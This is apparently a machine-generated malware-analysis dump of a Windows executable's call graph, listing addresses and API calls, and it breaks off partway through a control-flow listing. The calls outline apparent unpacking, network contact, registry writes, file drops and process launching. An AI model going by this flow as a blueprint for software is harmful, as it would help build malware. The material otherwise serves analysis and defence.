4193ad __fread_nolock 38898->38906 38946 41234b 20 API calls __dosmaperr 38898->38946 38899->38906 38912 4195d4 38899->38912 38913 4195eb 38899->38913 38900->38899 38905 419567 GetLastError 38900->38905 38901 41629a _free 20 API calls 38901->38867 38904->38880 38905->38898 38906->38901 38907 4193e8 38945 41236e 20 API calls __dosmaperr 38907->38945 38908 41961b 38950 41236e 20 API calls __dosmaperr 38908->38950 38947 418fc9 31 API calls 3 library calls 38912->38947 38913->38906 38914 419602 38913->38914 38948 418e09 29 API calls _Xfiopen 38914->38948 38917 419607 38917->38906 38918->38826 38919->38842 38920->38837 38921->38834 38922->38845 38923->38846 38924->38842 38925->38827 38926->38834 38927->38842 38929 421113 38928->38929 38930 421106 38928->38930 38934 42111f 38929->38934 38955 412381 20 API calls __dosmaperr 38929->38955 38954 412381 20 API calls __dosmaperr 38930->38954 38933 42110b 38933->38884 38934->38884 38935 421140 38956 410905 26 API calls _Deallocate 38935->38956 38937->38858 38938->38867 38939->38868 38940->38865 38941->38876 38942->38883 38943->38906 38944->38907 38945->38906 38946->38906 38947->38906 38948->38917 38949->38908 38950->38906 38951->38861 38952->38865 38953->38867 38954->38933 38955->38935 38956->38933 38957 5cf003c 38958 5cf0049 38957->38958 38972 5cf0e0f SetErrorMode SetErrorMode 38958->38972 38963 5cf0265 38964 5cf02ce VirtualProtect 38963->38964 38967 5cf030b 38964->38967 38965 5cf0439 VirtualFree 38970 5cf05f4 LoadLibraryA 38965->38970 38971 5cf04be 38965->38971 38966 5cf04e3 LoadLibraryA 38966->38971 38967->38965 38969 5cf08c7 38970->38969 38971->38966 38971->38970 38973 5cf0223 38972->38973 38974 5cf0d90 38973->38974 38975 5cf0dad 38974->38975 38976 5cf0dbb GetPEB 38975->38976 38977 5cf0238 VirtualAlloc 38975->38977 38976->38977 38977->38963 38978 409385 38979 409391 ___scrt_is_nonwritable_in_current_image 38978->38979 39010 40959e 38979->39010 38981 409398 38982 4094eb 38981->38982 38985 4093c2 38981->38985 39116 409a73 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 38982->39116 38984 4094f2 39107 413b51 38984->39107 38994 409401 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 38985->38994 39110 413876 5 API calls ___crtCompareStringA 38985->39110 38990 4093db 38992 4093e1 38990->38992 39111 41381a 5 API calls ___crtCompareStringA 38990->39111 39000 409462 38994->39000 39112 40e677 39 API calls 5 library calls 38994->39112 39021 409b8d 39000->39021 39011 4095a7 39010->39011 39118 409d1b IsProcessorFeaturePresent 39011->39118 39013 4095b3 39119 40c90d 10 API calls 3 library calls 39013->39119 39015 4095b8 39016 4095bc 39015->39016 39120 415329 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39015->39120 39016->38981 39018 4095c5 39019 4095d3 39018->39019 39121 40c936 8 API calls 3 library calls 39018->39121 39019->38981 39122 40b740 39021->39122 39023 409ba0 GetStartupInfoW 39024 409468 39023->39024 39025 4137c7 39024->39025 39124 41e091 39025->39124 39027 409471 39030 424a0e 39027->39030 39028 4137d0 39028->39027 39128 41e39b 38 API calls 39028->39128 39031 424a1e _Xfiopen 39030->39031 39032 401b1e 27 API calls 39031->39032 39033 424a4c 39032->39033 39130 403498 39033->39130 39038 401b1e 27 API calls 39039 424aac 39038->39039 39137 4265bc 39039->39137 39042 401b1e 27 API calls 39043 424ac5 GetModuleFileNameA 39042->39043 39044 401b1e 27 API calls 39043->39044 39045 424aee 39044->39045 39157 42604a 39045->39157 39047 424afe 39048 4252ab 39047->39048 39049 401b1e 27 API calls 39047->39049 39050 401b1e 27 API calls 39048->39050 39053 424f72 39049->39053 39051 425482 39050->39051 39261 40356f 39051->39261 39176 4034e3 39053->39176 39055 42549f 39056 42676c 63 API calls 39055->39056 39063 425526 39056->39063 39057 424f9c 39184 42676c 39057->39184 39059 4250db 39247 42615a 39059->39247 39064 42676c 63 API calls 39063->39064 39069 42588a ___scrt_fastfail 39064->39069 39065 425fc0 39297 4019f8 26 API calls 39065->39297 39069->39065 39269 426582 39069->39269 39075 401b1e 27 API calls 39076 425924 39075->39076 39275 426510 39076->39275 39078 425929 39079 42676c 63 API calls 39078->39079 39082 425b35 ___scrt_fastfail 39079->39082 39080 425fb4 39296 4019f8 26 API calls 39080->39296 39083 426582 51 API calls 39082->39083 39086 425cfd 39082->39086 39084 425ba4 ___scrt_fastfail 39083->39084 39085 426582 51 API calls 39084->39085 39087 425bc7 ___scrt_fastfail 39085->39087 39086->39080 39096 42676c 63 API calls 39086->39096 39087->39087 39088 426242 3 API calls 39087->39088 39089 425cbb 39088->39089 39089->39086 39090 425cc0 CreateDirectoryA 39089->39090 39282 42628b 39090->39282 39092 425ce2 39092->39086 39093 401b1e 27 API calls 39092->39093 39094 425cf8 39093->39094 39095 426510 29 API calls 39094->39095 39095->39086 39098 425eff ___scrt_fastfail 39096->39098 39099 426582 51 API calls 39098->39099 39103 425f9b 39098->39103 39100 425f6d 39099->39100 39101 426242 3 API calls 39100->39101 39102 425f7f 39101->39102 39102->39103 39104 401b1e 27 API calls 39102->39104 39295 4019f8 26 API calls 39103->39295 39105 425f96 39104->39105 39106 426510 29 API calls 39105->39106 39106->39103 39733 4138ce 39107->39733 39110->38990 39111->38994 39112->39000 39116->38984 39118->39013 39119->39015 39120->39018 39121->39016 39123 40b757 39122->39123 39123->39023 39123->39123 39125 41e09a 39124->39125 39126 41e0a3 39124->39126 39129 41df90 51 API calls 5 library calls 39125->39129 39126->39028 39128->39028 39129->39126 39131 4034c0 39130->39131 39132 4034d9 39130->39132 39131->39132 39298 40e509 46 API calls 39131->39298 39134 401b52 39132->39134 39299 402d13 39134->39299 39136 401b68 39136->39038 39138 4265c6 __EH_prolog 39137->39138 39304 403e0c 39138->39304 39140 4265ea 39140->39140 39141 402c71 27 API calls 39140->39141 39142 42664f 39141->39142 39318 404097 39142->39318 39144 4266fe 39146 42671a std::ios_base::_Ios_base_dtor 39144->39146 39335 40387f 26 API calls 2 library calls 39144->39335 39331 402bef 39146->39331 39148 4266d6 39151 402c50 27 API calls 39148->39151 39149 402c71 27 API calls 39149->39148 39153 4266f6 39151->39153 39155 402bef 26 API calls 39153->39155 39154 402bef 26 API calls 39156 424ab8 39154->39156 39155->39144 39156->39042 39158 426054 __EH_prolog 39157->39158 39475 401bb2 39158->39475 39163 4260b3 39491 401a16 39163->39491 39164 426097 39512 401b6f 39164->39512 39167 4260c0 39494 4024a1 39167->39494 39168 4260aa std::ios_base::_Ios_base_dtor 39168->39047 39174 42610e 39175 401b6f 68 API calls 39174->39175 39175->39168 39177 4034ed __EH_prolog 39176->39177 39664 401056 39177->39664 39179 403513 39180 401056 50 API calls 39179->39180 39181 403542 39180->39181 39668 40399f 39181->39668 39183 403553 39183->39057 39185 426776 __EH_prolog 39184->39185 39186 401b1e 27 API calls 39185->39186 39187 426b3f 39186->39187 39706 401aa1 39187->39706 39189 426b55 39190 401aa1 27 API calls 39189->39190 39191 426bdc 39190->39191 39192 401aa1 27 API calls 39191->39192 39193 426be9 39192->39193 39194 401aa1 27 API calls 39193->39194 39195 426c4c 39194->39195 39196 401aa1 27 API calls 39195->39196 39197 426c5d 39196->39197 39198 401aa1 27 API calls 39197->39198 39199 426c6a 39198->39199 39200 401aa1 27 API calls 39199->39200 39201 426d15 39200->39201 39202 401aa1 27 API calls 39201->39202 39203 42700c 39202->39203 39204 401aa1 27 API calls 39203->39204 39205 4272bb 39204->39205 39206 401aa1 27 API calls 39205->39206 39233 4272c8 39206->39233 39207 4273e4 39208 401aa1 27 API calls 39207->39208 39209 4273f1 WSAStartup 39208->39209 39210 42740b socket 39209->39210 39232 427642 39209->39232 39211 427423 39210->39211 39212 427438 39210->39212 39214 42742c WSACleanup 39211->39214 39213 427440 gethostbyname 39212->39213 39215 427451 ctype 39213->39215 39213->39232 39217 4277f3 39214->39217 39218 427464 htons connect 39215->39218 39216 4277e6 WSACleanup closesocket 39216->39217 39217->39059 39219 427493 39218->39219 39218->39232 39220 4274a5 send 39219->39220 39221 4274b5 39220->39221 39220->39232 39222 4274bb send 39221->39222 39227 4274d1 ___scrt_fastfail 39221->39227 39222->39227 39222->39232 39223 4274f7 recv 39223->39227 39223->39232 39224 412faf 46 API calls 39224->39227 39225 427635 39226 42763c 39225->39226 39228 42777d 39225->39228 39245 427651 39225->39245 39226->39232 39226->39245 39227->39223 39227->39224 39227->39225 39227->39232 39712 411957 42 API calls 39227->39712 39230 42779d recv 39228->39230 39228->39232 39229 427675 recv 39229->39232 39229->39245 39230->39228 39230->39232 39232->39216 39233->39207 39235 401aa1 27 API calls 39233->39235 39234 427770 39234->39232 39236 4273b4 39235->39236 39710 403ae1 27 API calls 39236->39710 39239 4273bf 39711 401ac2 27 API calls 39239->39711 39241 4273cc 39244 401aa1 27 API calls 39241->39244 39243 427712 recv 39243->39232 39243->39245 39244->39207 39245->39229 39245->39232 39245->39234 39245->39243 39246 42773d recv 39245->39246 39713 411957 42 API calls 39245->39713 39714 426148 22 API calls 39245->39714 39246->39232 39246->39245 39720 42780c 39247->39720 39249 426164 RegCreateKeyExA 39250 426222 39249->39250 39251 426197 39249->39251 39252 42529e 39250->39252 39253 426228 RegCloseKey 39250->39253 39254 402c71 27 API calls 39251->39254 39294 4019f8 26 API calls 39252->39294 39253->39252 39255 4261c0 39254->39255 39256 402c71 27 API calls 39255->39256 39257 4261e9 RegSetValueExA 39256->39257 39258 402bef 26 API calls 39257->39258 39259 42621a 39258->39259 39260 402bef 26 API calls 39259->39260 39260->39250 39262 403579 __EH_prolog 39261->39262 39263 401056 50 API calls 39262->39263 39264 40359c 39263->39264 39265 401056 50 API calls 39264->39265 39266 4035c8 39265->39266 39267 40399f 27 API calls 39266->39267 39268 4035d9 39267->39268 39268->39055 39721 410c7b 39269->39721 39272 426242 CreateFileA 39273 42590d 39272->39273 39274 426269 WriteFile FindCloseChangeNotification 39272->39274 39273->39075 39273->39078 39274->39273 39276 426521 39275->39276 39276->39276 39277 426529 ShellExecuteExA 39276->39277 39278 426575 39277->39278 39279 42655e WaitForSingleObject CloseHandle 39277->39279 39280 402bef 26 API calls 39278->39280 39279->39278 39281 42657d 39280->39281 39281->39078 39732 427830 39282->39732 39284 426297 CoInitialize CoCreateInstance 39285 4262ef MultiByteToWideChar SysAllocStringLen 39284->39285 39293 4262d1 __except_handler3 39284->39293 39287 426324 39285->39287 39287->39287 39288 42632b MultiByteToWideChar 39287->39288 39289 42633f 39288->39289 39289->39289 39290 426346 MultiByteToWideChar SysAllocStringLen 39289->39290 39291 426368 39290->39291 39291->39291 39292 42636f MultiByteToWideChar 39291->39292 39292->39293 39293->39092 39298->39131 39300 402d2a 39299->39300 39302 402d31 ctype 39300->39302 39303 403859 27 API calls std::_Facet_Register 39300->39303 39302->39136 39303->39302 39305 403e16 __EH_prolog 39304->39305 39336 407d73 39305->39336 39307 403e38 39346 404189 39307->39346 39313 403e7f 39384 4044e5 39313->39384 39315 403e8b 39405 4043fe 39315->39405 39319 4040a1 __EH_prolog 39318->39319 39325 4040b2 39319->39325 39468 40429b 27 API calls __EH_prolog 39319->39468 39321 4040d9 39469 404777 27 API calls 39321->39469 39323 404152 39473 404238 26 API calls _Deallocate 39323->39473 39325->39144 39325->39148 39325->39149 39327 404144 39472 404777 27 API calls 39327->39472 39330 4040e9 39330->39323 39330->39327 39470 404777 27 API calls 39330->39470 39471 404579 26 API calls 39330->39471 39332 402c03 39331->39332 39333 402bfa 39331->39333 39332->39154 39474 40387f 26 API calls 2 library calls 39333->39474 39335->39146 39337 407d7f __EH_prolog3 39336->39337 39409 407b1c 39337->39409 39340 407da5 _Yarn 39415 407b74 39340->39415 39343 407d9d 39423 407f02 40 API calls _Atexit 39343->39423 39345 407dfb std::locale::_Init 39345->39307 39347 404193 __EH_prolog 39346->39347 39348 407b1c std::_Lockit::_Lockit 2 API calls 39347->39348 39349 4041a2 39348->39349 39428 401318 39349->39428 39351 4041b9 std::locale::_Getfacet 39353 4041cc 39351->39353 39434 40436e 55 API calls 3 library calls 39351->39434 39352 407b74 std::_Lockit::~_Lockit 2 API calls 39354 403e49 39352->39354 39353->39352 39362 4033ea 39354->39362 39356 4041dc 39357 4041e3 39356->39357 39358 404219 39356->39358 39435 407d41 8 API calls std::_Facet_Register 39357->39435 39436 40abcb RaiseException 39358->39436 39361 40422f 39363 4033f4 __EH_prolog 39362->39363 39364 407b1c std::_Lockit::_Lockit 2 API calls 39363->39364 39365 403403 39364->39365 39366 401318 int 4 API calls 39365->39366 39367 40341a std::locale::_Getfacet 39366->39367 39368 40342d 39367->39368 39437 401429 55 API calls 2 library calls 39367->39437 39369 407b74 std::_Lockit::~_Lockit 2 API calls 39368->39369 39371 40346a 39369->39371 39378 404424 39371->39378 39372 40343d 39373 403444 39372->39373 39374 40347a 39372->39374 39438 407d41 8 API calls std::_Facet_Register 39373->39438 39439 40abcb RaiseException 39374->39439 39377 403490 39379 40442e __EH_prolog 39378->39379 39440 404d6b 39379->39440 39381 404463 39443 409256 39381->39443 39383 40447e 39383->39313 39385 4044ef __EH_prolog 39384->39385 39462 405177 8 API calls std::_Facet_Register 39385->39462 39387 40450d 39463 405025 29 API calls std::_Facet_Register 39387->39463 39389 404517 39390 404571 39389->39390 39391 40451e 39389->39391 39466 404efe 27 API calls 39390->39466 39464 405119 8 API calls std::_Facet_Register 39391->39464 39394 404528 39465 405e85 8 API calls std::_Facet_Register 39394->39465 39396 404531 39396->39315 39406 403eb8 39405->39406 39407 404406 39405->39407 39406->39140 39467 40387f 26 API calls 2 library calls 39407->39467 39410 407b32 39409->39410 39411 407b2b 39409->39411 39413 407b30 39410->39413 39425 408745 EnterCriticalSection 39410->39425 39424 411a5a EnterCriticalSection std::_Lockit::_Lockit 39411->39424 39413->39340 39422 407edf 8 API calls 2 library calls 39413->39422 39416 411a63 39415->39416 39417 407b7e 39415->39417 39427 411a43 LeaveCriticalSection 39416->39427 39418 407b91 39417->39418 39426 408753 LeaveCriticalSection 39417->39426 39418->39345 39420 411a6a 39420->39345 39422->39343 39423->39340 39424->39413 39425->39413 39426->39418 39427->39420 39429 401324 39428->39429 39430 401348 39428->39430 39431 407b1c std::_Lockit::_Lockit 2 API calls 39429->39431 39430->39351 39432 40132e 39431->39432 39433 407b74 std::_Lockit::~_Lockit 2 API calls 39432->39433 39433->39430 39434->39356 39435->39353 39436->39361 39437->39372 39438->39368 39439->39377 39450 404eb6 39440->39450 39442 404d85 39442->39381 39442->39442 39446 40925b ___crtCompareStringA 39443->39446 39444 409275 39444->39383 39446->39444 39447 409277 std::_Facet_Register 39446->39447 39460 412ede 7 API calls 2 library calls 39446->39460 39461 40abcb RaiseException 39447->39461 39449 40996c 39451 404ed2 39450->39451 39452 404ece 39450->39452 39453 404ef8 39451->39453 39454 404eda 39451->39454 39452->39442 39459 4030f6 27 API calls 39453->39459 39458 403859 27 API calls std::_Facet_Register 39454->39458 39458->39452 39460->39446 39461->39449 39462->39387 39463->39389 39464->39394 39465->39396 39467->39406 39468->39321 39469->39330 39470->39330 39471->39330 39472->39323 39474->39332 39476 401bbc __EH_prolog 39475->39476 39516 40307c 39476->39516 39482 401c1f 39483 401c51 39482->39483 39534 40187f 42 API calls 2 library calls 39482->39534 39485 402403 39483->39485 39486 40240d __EH_prolog 39485->39486 39552 402b06 39486->39552 39489 402441 39489->39163 39489->39164 39598 402baa 39491->39598 39493 401a30 ___scrt_fastfail 39493->39167 39495 4024ab __EH_prolog 39494->39495 39496 4024e4 39495->39496 39608 40187f 42 API calls 2 library calls 39495->39608 39497 402b06 42 API calls 39496->39497 39499 4024ee 39497->39499 39500 402551 39499->39500 39503 401d87 65 API calls 39499->39503 39504 40257c 39500->39504 39501 402511 39501->39500 39609 40187f 42 API calls 2 library calls 39501->39609 39503->39501 39505 402586 __EH_prolog 39504->39505 39506 402b06 42 API calls 39505->39506 39509 4025a8 39506->39509 39507 40265a 39515 402b87 26 API calls _Deallocate 39507->39515 39510 4025d8 39509->39510 39610 401f2b 39509->39610 39510->39507 39614 40187f 42 API calls 2 library calls 39510->39614 39652 4023b6 39512->39652 39514 401b95 39514->39168 39515->39174 39517 403086 __EH_prolog 39516->39517 39535 403175 39517->39535 39520 402fe5 39521 402fef __EH_prolog 39520->39521 39522 409256 std::_Facet_Register 8 API calls 39521->39522 39523 403005 39522->39523 39524 407d73 std::locale::_Init 43 API calls 39523->39524 39525 403013 39524->39525 39546 402e7b 39525->39546 39528 402f6b 39529 402f75 __EH_prolog 39528->39529 39530 402e7b 26 API calls 39529->39530 39533 402fbf std::ios_base::_Ios_base_dtor 39529->39533 39531 402f9d 39530->39531 39551 4035f5 55 API calls 7 library calls 39531->39551 39533->39482 39534->39483 39536 40317f __EH_prolog 39535->39536 39537 409256 std::_Facet_Register 8 API calls 39536->39537 39538 4031b9 39537->39538 39539 407d73 std::locale::_Init 43 API calls 39538->39539 39540 4031c6 39539->39540 39541 4033ea 55 API calls 39540->39541 39542 4031f5 std::ios_base::_Ios_base_dtor 39541->39542 39543 401bec 39542->39543 39545 40187f 42 API calls 2 library calls 39542->39545 39543->39520 39545->39543 39547 401c0f 39546->39547 39548 402ed9 39546->39548 39547->39528 39550 40e7d7 26 API calls 2 library calls 39548->39550 39550->39547 39551->39533 39553 402b10 __EH_prolog 39552->39553 39564 403101 39553->39564 39556 401d87 39557 401d99 39556->39557 39563 401df4 39557->39563 39572 402dfd 39557->39572 39560 401de1 39560->39563 39581 40fd67 39560->39581 39563->39489 39566 40310b __EH_prolog 39564->39566 39565 403128 39567 40241d 39565->39567 39571 40187f 42 API calls 2 library calls 39565->39571 39566->39565 39570 403242 42 API calls __EH_prolog 39566->39570 39567->39489 39567->39556 39570->39565 39571->39567 39573 402e0d 39572->39573 39577 401dc4 39572->39577 39573->39577 39592 4022ae 65 API calls 39573->39592 39575 402e1a 39575->39577 39593 40ea7d 65 API calls 2 library calls 39575->39593 39577->39560 39577->39563 39578 4106d4 39577->39578 39579 41049b _Xfiopen 64 API calls 39578->39579 39580 4106ea 39579->39580 39580->39560 39582 40fd72 39581->39582 39584 40fd87 39581->39584 39594 412381 20 API calls __dosmaperr 39582->39594 39591 40fd9f 39584->39591 39596 412381 20 API calls __dosmaperr 39584->39596 39585 40fd77 39595 410905 26 API calls _Deallocate 39585->39595 39588 40fd94 39597 410905 26 API calls _Deallocate 39588->39597 39590 40fd82 39590->39563 39591->39563 39592->39575 39593->39577 39594->39585 39595->39590 39596->39588 39597->39591 39599 402bc6 39598->39599 39604 402bc2 39598->39604 39600 402be9 39599->39600 39601 402bce 39599->39601 39607 4030f6 27 API calls 39600->39607 39606 403859 27 API calls std::_Facet_Register 39601->39606 39604->39493 39606->39604 39608->39496 39609->39500 39611 401f52 ctype 39610->39611 39613 401f3f 39610->39613 39611->39613 39615 4102e9 39611->39615 39613->39510 39614->39507 39618 410306 39615->39618 39617 410301 39617->39613 39619 410312 ___scrt_is_nonwritable_in_current_image 39618->39619 39620 41034a std::_Locinfo::_Locinfo_dtor 39619->39620 39621 410352 39619->39621 39622 410325 ___scrt_fastfail 39619->39622 39620->39617 39631 40e81d EnterCriticalSection 39621->39631 39645 412381 20 API calls __dosmaperr 39622->39645 39625 41035c 39632 41011d 39625->39632 39626 41033f 39646 410905 26 API calls _Deallocate 39626->39646 39631->39625 39633 41014c 39632->39633 39636 41012f ___scrt_fastfail 39632->39636 39647 410391 LeaveCriticalSection __fread_nolock 39633->39647 39634 41013c 39648 412381 20 API calls __dosmaperr 39634->39648 39636->39633 39636->39634 39642 41018f __fread_nolock 39636->39642 39638 4102ab ___scrt_fastfail 39651 412381 20 API calls __dosmaperr 39638->39651 39640 4154e8 _Xfiopen 26 API calls 39640->39642 39642->39633 39642->39638 39642->39640 39644 4192ad __fread_nolock 38 API calls 39642->39644 39650 410399 26 API calls 4 library calls 39642->39650 39643 410141 39649 410905 26 API calls _Deallocate 39643->39649 39644->39642 39645->39626 39646->39620 39647->39620 39648->39643 39649->39633 39650->39642 39651->39643 39653 4023dd 39652->39653 39654 4023ef 39653->39654 39656 402f2f 39653->39656 39654->39514 39657 402f39 39656->39657 39658 402f3d 39656->39658 39661 402e7b 26 API calls 39657->39661 39659 402dfd 65 API calls 39658->39659 39660 402f42 39659->39660 39662 40e228 _Xfiopen 67 API calls 39660->39662 39663 402f66 39661->39663 39662->39657 39663->39654 39665 40106d ___scrt_initialize_default_local_stdio_options 39664->39665 39672 40fd43 39665->39672 39669 4039c7 39668->39669 39670 4039bb 39668->39670 39669->39183 39671 402c71 27 API calls 39670->39671 39671->39669 39675 40ead5 39672->39675 39676 40eb15 39675->39676 39677 40eafd 39675->39677 39676->39677 39679 40eb1d 39676->39679 39699 412381 20 API calls __dosmaperr 39677->39699 39701 40e3f2 38 API calls 2 library calls 39679->39701 39680 40eb02 39700 410905 26 API calls _Deallocate 39680->39700 39683 40eb0d 39692 4097a5 39683->39692 39684 40eb2d 39702 40eef9 20 API calls __dosmaperr 39684->39702 39687 40107b 39687->39179 39688 40eba5 39703 40f0ad 50 API calls 2 library calls 39688->39703 39691 40ebb0 39704 40ef2e 20 API calls _free 39691->39704 39693 4097b0 IsProcessorFeaturePresent 39692->39693 39694 4097ae 39692->39694 39696 409efa 39693->39696 39694->39687 39705 409ebe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39696->39705 39698 409fdd 39698->39687 39699->39680 39700->39683 39701->39684 39702->39688 39703->39691 39704->39683 39705->39698 39707 401aab 39706->39707 39707->39707 39715 402cba 39707->39715 39709 401abd 39709->39189 39710->39239 39711->39241 39712->39227 39713->39245 39714->39245 39716 402cd0 BuildCatchObjectHelperInternal 39715->39716 39717 402cfa 39715->39717 39716->39709 39719 4037a9 27 API calls 2 library calls 39717->39719 39719->39716 39720->39249 39722 410c87 39721->39722 39723 410c9c 39721->39723 39729 412381 20 API calls __dosmaperr 39722->39729 39731 410965 51 API calls 4 library calls 39723->39731 39726 410c8c 39730 410905 26 API calls _Deallocate 39726->39730 39727 410c97 39727->39272 39729->39726 39730->39727 39731->39727 39732->39284 39734 4138da CallUnexpected 39733->39734 39735 4138e1 39734->39735 39736 4138f3 39734->39736 39772 413a28 GetModuleHandleW 39735->39772 39757 4119fb EnterCriticalSection 39736->39757 39739 4138e6 39739->39736 39773 413a6c GetModuleHandleExW 39739->39773 39744 41396f 39754 413987 39744->39754 39781 41381a 5 API calls ___crtCompareStringA 39744->39781 39745 4138fa 39745->39744 39755 413998 39745->39755 39758 4151ba 39745->39758 39746 4139e1 39783 424569 5 API calls ___crtCompareStringA 39746->39783 39747 4139b5 39764 4139e7 39747->39764 39782 41381a 5 API calls ___crtCompareStringA 39754->39782 39761 4139d8 39755->39761 39757->39745 39784 414ef3 39758->39784 39803 411a43 LeaveCriticalSection 39761->39803 39763 4139b1 39763->39746 39763->39747 39804 4177fa 39764->39804 39767 413a15 39770 413a6c _abort 8 API calls 39767->39770 39768 4139f5 GetPEB 39768->39767 39769 413a05 GetCurrentProcess TerminateProcess 39768->39769 39769->39767 39771 413a1d ExitProcess 39770->39771 39772->39739 39774 413a96 GetProcAddress 39773->39774 39775 413ab9 39773->39775 39776 413aab 39774->39776 39777 413ac8 39775->39777 39778 413abf FreeLibrary 39775->39778 39776->39775 39779 4097a5 ___crtCompareStringA 5 API calls 39777->39779 39778->39777 39780 4138f2 39779->39780 39780->39736 39781->39754 39782->39755 39787 414ea2 39784->39787 39786 414f17 39786->39744 39788 414eae ___scrt_is_nonwritable_in_current_image 39787->39788 39795 4119fb EnterCriticalSection 39788->39795 39790 414ebc 39796 414f43 39790->39796 39794 414eda std::_Locinfo::_Locinfo_dtor 39794->39786 39795->39790 39797 414f63 39796->39797 39798 414f6b 39796->39798 39799 4097a5 ___crtCompareStringA 5 API calls 39797->39799 39798->39797 39801 41629a _free 20 API calls 39798->39801 39800 414ec9 39799->39800 39802 414ee7 LeaveCriticalSection std::_Lockit::~_Lockit 39800->39802 39801->39797 39802->39794 39803->39763 39805 417815 39804->39805 39806 41781f 39804->39806 39808 4097a5 ___crtCompareStringA 5 API calls 39805->39808 39811 4171b7 5 API calls 2 library calls 39806->39811 39809 4139f1 39808->39809 39809->39767 39809->39768 39810 417836 39810->39805 39811->39810 39812 4264f9 SysFreeString SysFreeString CoUninitialize 39813 41870f 39814 41871b ___scrt_is_nonwritable_in_current_image 39813->39814 39815 418727 39814->39815 39816 41873e 39814->39816 39847 412381 20 API calls __dosmaperr 39815->39847 39826 40e81d EnterCriticalSection 39816->39826 39819 41872c 39848 410905 26 API calls _Deallocate 39819->39848 39820 41874e 39827 41878b 39820->39827 39823 41875a 39849 418781 LeaveCriticalSection __fread_nolock 39823->39849 39825 418737 std::_Locinfo::_Locinfo_dtor 39826->39820 39828 4187b3 39827->39828 39829 418799 39827->39829 39831 4154e8 _Xfiopen 26 API calls 39828->39831 39853 412381 20 API calls __dosmaperr 39829->39853 39833 4187bc 39831->39833 39832 41879e 39854 410905 26 API calls _Deallocate 39832->39854 39850 4197e5 39833->39850 39836 4187a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39836->39823 39838 4188c0 39840 4188cd 39838->39840 39841 418873 39838->39841 39839 418844 39839->39841 39843 418861 39839->39843 39856 412381 20 API calls __dosmaperr 39840->39856 39841->39836 39857 418920 30 API calls 2 library calls 39841->39857 39855 418aa4 31 API calls 3 library calls 39843->39855 39845 41886b 39845->39836 39847->39819 39848->39825 39849->39825 39858 419662 39850->39858 39852 4187d8 39852->39836 39852->39838 39852->39839 39853->39832 39854->39836 39855->39845 39856->39836 39857->39836 39859 41966e ___scrt_is_nonwritable_in_current_image 39858->39859 39860 419676 39859->39860 39861 41968e 39859->39861 39884 41236e 20 API calls __dosmaperr 39860->39884 39862 419742 39861->39862 39867 4196c6 39861->39867 39889 41236e 20 API calls __dosmaperr 39862->39889 39865 41967b 39885 412381 20 API calls __dosmaperr 39865->39885 39866 419747 39890 412381 20 API calls __dosmaperr 39866->39890 39883 41e5cd EnterCriticalSection 39867->39883 39871 41974f 39891 410905 26 API calls _Deallocate 39871->39891 39872 4196cc 39874 4196f0 39872->39874 39875 419705 39872->39875 39886 412381 20 API calls __dosmaperr 39874->39886 39877 419767 _Xfiopen 28 API calls 39875->39877 39880 419700 39877->39880 39878 4196f5 39887 41236e 20 API calls __dosmaperr 39878->39887 39879 419683 std::_Locinfo::_Locinfo_dtor 39879->39852 39888 41973a LeaveCriticalSection __wsopen_s 39880->39888 39883->39872 39884->39865 39885->39879 39886->39878 39887->39880 39888->39879 39889->39866 39890->39871 39891->39879

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 0 42676c-4272ca call 42780c call 403491 * 15 call 40197c call 403491 * 14 call 40197c call 403491 * 17 call 40197c call 403491 * 7 call 40197c call 403491 * 2 call 40197c call 403491 * 2 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 401b1e call 401a67 call 401aa1 call 403491 * 9 call 40197c call 401aa1 * 2 call 403491 * 6 call 40197c call 401aa1 call 401a67 call 401aa1 * 2 call 403491 * 12 call 40197c call 401aa1 call 403491 * 61 call 40197c call 401aa1 call 403491 * 55 call 40197c call 401aa1 * 2 473 4272d0-4272d3 0->473 474 4273e4-427405 call 401aa1 WSAStartup 0->474 473->474 476 4272d9-4273df call 403491 * 16 call 40197c call 401aa1 call 403ae1 call 401ac2 call 401ae8 call 401aa1 473->476 479 42740b-427421 socket 474->479 480 4277d9 474->480 476->474 483 427423-427433 call 40ff7e WSACleanup 479->483 484 427438-42744b call 401a67 gethostbyname 479->484 482 4277dc-4277e5 call 40ff7e 480->482 496 4277e6-4277ed WSACleanup closesocket 482->496 497 4277f3-42780b call 401ae8 483->497 484->482 494 427451-42748d call 40ac40 htons connect 484->494 494->482 504 427493-4274af call 403da5 call 401a67 send 494->504 496->497 504->482 514 4274b5-4274b9 504->514 516 4274d1-4274f5 call 40b740 514->516 517 4274bb-4274cb send 514->517 524 4274f7-42750b recv 516->524 517->482 517->516 524->482 525 427511-427516 524->525 528 42761e-427627 525->528 529 42751c-427524 525->529 528->482 532 42762d-427630 528->532 529->528 531 42752a-427532 529->531 531->528 534 427538-427543 531->534 532->524 536 427545-42755a call 412faf 534->536 537 427568-427571 534->537 536->482 545 427560-427563 536->545 540 427574-427579 537->540 540->540 543 42757b-42757d 540->543 546 427583-427598 call 403a0c 543->546 547 427635-42763a 543->547 549 427615-42761b 545->549 546->549 562 42759a-4275ba call 412faf 546->562 551 427647-42764b 547->551 552 42763c-427640 547->552 549->528 554 427651-42766d call 426152 551->554 555 42777d-42777f 551->555 553 427642 552->553 552->554 553->482 570 427670-427672 554->570 560 4277c3-4277d0 call 426152 555->560 561 427781-42779a call 426152 555->561 575 4277d2-4277d7 560->575 578 42779d-4277b0 recv 561->578 573 4275de-4275f6 call 412faf 562->573 574 4275bc-4275d6 call 411957 562->574 576 427675-427689 recv 570->576 573->549 591 4275f8-427612 call 412faf 573->591 574->482 590 4275dc 574->590 575->496 576->482 582 42768f-427694 576->582 578->482 579 4277b2-4277bf 578->579 579->578 584 4277c1 579->584 587 427763-42776a 582->587 588 42769a-42769f 582->588 584->575 587->576 592 427770 587->592 588->587 593 4276a5-4276aa 588->593 590->549 591->549 592->482 593->587 597 4276b0-4276d1 call 411957 593->597 597->482 604 4276d7-4276d9 597->604 604->482 606 4276df 604->606 608 427772-42777b 606->608 609 4276e5-4276f1 606->609 608->575 610 4276f3-42770a call 426148 609->610 611 42770d-42770f 609->611 610->611 614 